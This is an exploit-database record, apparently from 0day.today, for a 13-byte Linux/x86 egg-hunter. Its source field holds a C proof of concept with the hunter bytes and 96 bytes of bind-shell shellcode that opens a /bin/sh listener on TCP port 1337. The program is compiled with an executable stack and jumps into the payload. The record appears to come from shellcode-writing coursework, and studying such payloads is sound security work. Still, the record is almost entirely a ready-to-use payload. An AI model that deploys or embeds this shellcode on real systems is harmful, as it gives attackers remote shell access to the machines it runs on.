{"id": "1337DAY-ID-25648", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Linux/x86 - Egg-hunter Shellcode (13 bytes)", "description": "", "published": "2016-01-08T00:00:00", "modified": "2016-01-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/25648", "reporter": "Dennis Herrmann", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-04T16:09:06", "viewCount": 10, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "_state": {"dependencies": 1663695782, "score": 1663695947}, "_internal": {"score_hash": "426179c76e31bd892e5b1b664cd3b207"}, "sourceHref": "https://0day.today/exploit/25648", "sourceData": "/*\n * Title: Egg Hunter PoC\n * Platform: linux/x86\n * Date: 2015-01-07\n * Author: Dennis 'dhn' Herrmann\n * Website: https://zer0-day.pw\n * Github: https://github.com/dhn/SLAE/\n * SLAE-721\n */\n \n/*\n * egg_hunter.nasm\n * ---------------\n * BITS 32\n *\n * global _start\n * section .text\n *\n * EGG_SIG equ 0x4f904790 ; signature\n *\n * _start:\n * cdq ; sign-extend eax into edx (edx = 0 while eax is non-negative)\n * mov edx, EGG_SIG ; edx = 0x4f904790\n *\n * search_the_egg:\n * inc eax ; advance the search pointer by one byte\n * cmp DWORD [eax], edx ; compare the dword at [eax] with EGG_SIG\n * jne search_the_egg ; if not equal, keep scanning\n *\n * jmp eax ; egg found: jump to it (the egg bytes are executable)\n *\n */\n#include <stdio.h>\n#include <string.h>\n \n/*\n * Egg Signature:\n *\n * 0x4f 0x90 0x47 0x90\n * | | | |\n * dec edi - NOP - inc edi - NOP\n */\n#define EGG_SIG \"\\x90\\x47\\x90\\x4f\"\n \nunsigned char egg_hunter[] = \\\n \"\\x99\" /* cdq */\n \"\\xba\\x90\\x47\\x90\\x4f\" /* mov edx, 0x4f904790 */\n \"\\x40\" /* inc eax */\n \"\\x39\\x10\" /* cmp DWORD PTR [eax], edx */\n \"\\x75\\xfb\" /* jne 6 <search_the_egg> */\n \"\\xff\\xe0\"; /* jmp eax */\n \n/*\n * Bind Shell TCP shellcode - 96 bytes\n * bind to port: 1337\n */\nunsigned char shellcode[] = \\\n EGG_SIG /* Egg Signature */\n \"\\x6a\\x66\\x58\\x6a\\x01\\x5b\\x31\\xf6\"\n \"\\x56\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\"\n \"\\x80\\x5f\\x97\\x93\\xb0\\x66\\x56\\x66\"\n \"\\x68\\x05\\x39\\x66\\x6a\\x02\\x89\\xe1\"\n \"\\x6a\\x10\\x51\\x57\\x89\\xe1\\xcd\\x80\"\n \"\\xb0\\x66\\xb3\\x04\\x56\\x57\\x89\\xe1\"\n \"\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x56\\x56\"\n \"\\x57\\x89\\xe1\\xcd\\x80\\x93\\x31\\xc9\"\n \"\\xb1\\x03\\xfe\\xc9\\xb0\\x3f\\xcd\\x80\"\n \"\\x75\\xf8\\x6a\\x0b\\x58\\x31\\xc9\\x51\"\n \"\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\"\n \"\\x69\\x6e\\x89\\xe3\\x89\\xca\\xcd\\x80\";\n \n/*\n * $ gcc -Wl,-z,execstack -fno-stack-protector PoC.c -o PoC\n * [+] Egg Hunter Length: 13\n * [+] Shellcode Length + 4 byte egg: 100\n *\n */\nint main(void)\n{\n printf(\"[+] Egg Hunter Length: %zu\\n\", strlen((char *)egg_hunter));\n printf(\"[+] Shellcode Length + 4 byte egg: %zu\\n\", strlen((char *)shellcode));\n /* hand control to the egg hunter; it scans memory for EGG_SIG and jumps to the shellcode behind it */\n int (*ret)(void) = (int(*)(void))egg_hunter;\n ret();\n return 0;\n}\n", "category": "shellcode", "verified": true}